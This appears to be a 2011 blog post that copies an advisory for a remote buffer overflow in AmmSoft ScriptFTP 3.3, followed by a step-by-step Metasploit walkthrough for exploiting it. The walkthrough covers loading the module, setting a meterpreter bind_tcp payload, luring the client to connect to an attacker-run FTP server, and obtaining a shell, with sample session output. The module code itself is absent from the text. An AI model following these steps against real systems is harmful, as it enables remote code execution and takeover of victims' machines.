Sunday, 9 October 2011

AmmSoft ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability

AmmSoft ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability
Class: Boundary Condition Error
Remote: Yes
Local: No
Published: Sep 20 2011 12:00AM
Updated: Sep 30 2011 07:00AM
Credit: Tom Gregory
Vulnerable: AmmSoft ScriptFTP 3.3
Description : ScriptFTP is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the application. Failed attacks may cause a denial-of-service condition. ScriptFTP 3.3 is vulnerable; other versions may also be affected.

In order to exploit this you can either use the python or the metasploit exploit, I prefer using the the metasploit because of the payloads. So the first thing you need to do is put the exploit under the folder /pentest/exploits/framework3/modules/exploits/windows , I called mine scriptftp33.rb , just paste the content of

Now step by step
1) msfconsole
2) use windows/ftp/scriptftp33 ( To use the exploit that we just created)
3) set PAYLOAD windows/meterpreter/bind_tcp (To use meterpreter as our payload)
4) set RHOST (This is the ip address of the server that I am attacking)
5) exploit

Ok, now the attacking server bit is ready to go, you need to download the ftp script from and install it
Open the scriptftp and create and script with the following content:

CLOSEHOST = The ip address of the attacking server.
ftptest = username
passwordtest = password
Remember to create this user in your attacking server.
Save it as exploit.ftp
Now click open and select exploit.ftp
If everything goes all right, in your metasploit you now should see something like this :
msf exploit(scriptftp33) > [*] LOGIN ftptest / passwordtest
[*] - Data connection set up
[*] - Sending directory list via data connection
[*] Sending stage (752128 bytes) to
[*] Meterpreter session 1 opened ( -> at 2011-09-30 10:15:21


Right, now you have your meterpreter session, just type " sessions -i 1" and you can do everything you want ;)

That's it guys.

No comments:

Post a Comment